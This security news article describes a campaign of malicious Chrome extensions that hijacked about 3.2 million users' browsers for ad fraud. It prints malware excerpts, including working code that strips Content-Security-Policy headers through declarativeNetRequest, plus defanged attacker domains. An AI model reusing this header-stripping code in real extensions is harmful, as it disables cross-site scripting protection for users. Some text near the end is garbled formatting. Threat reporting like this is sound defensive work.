A coordinated campaign involving at least 16 malicious Chrome extensions infected over 3.2 million users worldwide, leveraging browser security vulnerabilities to execute advertising fraud and search engine optimization manipulation.
Discovered by GitLab Threat Intelligence in February 2025, these extensions, ranging from screen capture tools to ad blockers—hijacked user sessions, stripped critical security protections, and injected obfuscated payloads to manipulate browsing behavior.
Despite their removal from the Chrome Web Store, lingering risks persist for those who haven’t manually uninstalled the extensions.
However, the security analysts at GitLab detected that the campaign’s technical sophistication centered on degrading browser security through Content Security Policy (CSP) manipulation.
Anatomy of the Attack: Content Security Policy Stripping
Malicious extensions like Nimble Capture and KProxy deployed service workers to strip CSP headers, a critical defense against cross-site scripting attacks—from the first 2,000 websites visited per session.
The code below demonstrates how the threat actor leveraged Chrome’s declarativeNetRequest API to nullify CSP protections:
async function u(e) {
if (!(i.indexOf(e) > -1)) {
i.push(e);
try {
return s > 1999 && (s = 1), s++, chrome.declarativeNetRequest.updateDynamicRules({
addRules: [{
id: s,
action: {
type: "modifyHeaders",
responseHeaders: [{
header: "content-security-policy",
operation: "set",
value: ""
}]
},
condition: {
urlFilter: e,
resourceTypes: ["main_frame", "sub_frame"]
}
}],
removeRuleIds: [s]
})
} catch (t) {}
}
}By disabling CSP, the attackers created a permissive environment for injecting scripts. The extensions then connected to configuration servers (api.nimblecapture[.]com) to fetch obfuscated JavaScript payloads.
These payloads, such as rcx-cd-v3.js, established bidirectional communication channels between victims’ browsers and the attackers’ infrastructure hosted on Bunny CDN and DigitalOcean Apps.
A unique x-do-app-origin header (978bc8ed-09a8-444b-9142-df5a19366612) tied all traffic to a single Express application.
The threat actor employed a multi-stage delivery chain. After disabling CSP, extensions loaded malicious configurations containing dynamically generated UUIDs and hashed hostnames.
For example, the initialSet function in Nimble Capture injected a remote script (rcx-cd-v3.js) into web pages, which then bridged Chrome’s privileged APIs (chrome.declarativeNetRequest) to page contexts.
This allowed attackers to:-
- Modify ad display rules to prioritize fraudulent ads.
- Block analytics services like Microsoft Clarity.
- Redirect affiliate traffic to domains such as AliExpress and Surfshark using injected iframes.
async function YOKoc() {
let sKBoc = await vsRead("s");
if (["DE", "FR", "GB"].includes(getGeo()) && getDomain().indexOf("amazon") > -1) {
await Eftnc();
let MZfpc = await ceqnc("/exporter/get-campaign", { /* ... */ });
if (MZfpc) gVWoc(MZfpc.d);
}
}The injected scripts also harvested browsing histories and session cookies, potentially exposing credentials and sensitive data.
.webp)
Reviews from impacted users described unexpected redirects and performance degradation-hallmarks of these scripts’ operations.
This campaign highlights systemic vulnerabilities in browser extension ecosystems. By compromising existing extensions through developer account takeovers – not code exploits – the attackers bypassed Google’s security reviews.
Organizations must audit extension permissions (` access) and monitor for unusual network traffic to domains likeblipshotextension[.]comorkproxyservers[.]site`. For individuals, vigilance in granting broad permissions remains critical.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here